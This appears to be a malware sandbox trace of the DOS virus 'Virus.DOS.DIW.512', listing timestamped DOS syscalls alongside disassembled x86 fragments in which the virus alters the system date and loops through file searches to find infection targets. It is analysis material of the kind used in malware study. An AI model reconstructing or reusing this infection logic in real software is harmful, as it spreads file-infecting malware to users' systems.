Sample viewer

vx.netlux.org/Virus.DOS.DIW.512

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:52:57.491204517Z 47 PC: 12ad5 | Get disk transfer address
2018-12-17T22:52:57.492788944Z 26 PC: 12ae3 | Set disk transfer address
2018-12-17T22:52:57.493807429Z 42 PC: 12ae7 | Get date 0x12ae7: mov word ptr cs:[di + 0x33], cx
0x12aeb: mov word ptr cs:[di + 0x35], dx
0x12aef: sub cx, 1
0x12af2: mov dh, 0xb
0x12af4: mov dl, 0x1c
0x12af6: mov ah, 0x2b
0x12af8: int 0x21
0x12afa: pop dx
0x12afb: add dx, 3
0x12afe: call 0x12bb8
0x12b01: call 0x12bec
0x12b04: call 0x12c32
0x12b07: mov ah, 0x1a
0x12b09: mov dx, word ptr cs:[di + 0xc]
0x12b0d: int 0x21
0x12b0f: mov cx, word ptr cs:[di + 0x33]
0x12b13: mov dx, word ptr cs:[di + 0x35]
0x12b17: mov ah, 0x2b
0x12b19: int 0x21
0x12b1b: mov bx, 0x100
2018-12-17T22:52:57.495753799Z 43 PC: 12afa | Set date
2018-12-17T22:52:57.505213786Z 44 PC: 12bbe | Get time 0x12bbe: pop dx
0x12bbf: cmp ch, 0xf
0x12bc2: jl 0x12beb
0x12bc4: mov ah, 0x4e
0x12bc6: mov cx, 0xef
0x12bc9: int 0x21
0x12bcb: jb 0x12beb
0x12bcd: mov ah, 0x2f
0x12bcf: int 0x21
0x12bd1: mov dx, bx
0x12bd3: mov bx, dx
0x12bd5: mov ax, word ptr es:[bx + 0x1a]
0x12bd9: sub ax, 3
0x12bdc: mov word ptr cs:[di + 1], ax
0x12be0: call 0x22b39
0x12be3: mov ah, 0x4f
0x12be5: int 0x21
0x12be7: jb 0x12beb
0x12be9: loop 0x12bd3
0x12beb: ret
2018-12-17T22:52:57.5073242Z 78 PC: 12c1c | Find first file
2018-12-17T22:52:57.517541585Z 78 PC: 12c1c | Find first file
2018-12-17T22:52:57.52451159Z 78 PC: 12c1c | Find first file
2018-12-17T22:52:57.530082947Z 78 PC: 12c1c | Find first file
2018-12-17T22:52:57.535498609Z 78 PC: 12c1c | Find first file
2018-12-17T22:52:57.542196801Z 78 PC: 12c57 | Find first file
2018-12-17T22:52:57.54762577Z 26 PC: 12b0f | Set disk transfer address
2018-12-17T22:52:57.548565999Z 43 PC: 12b1b | Set date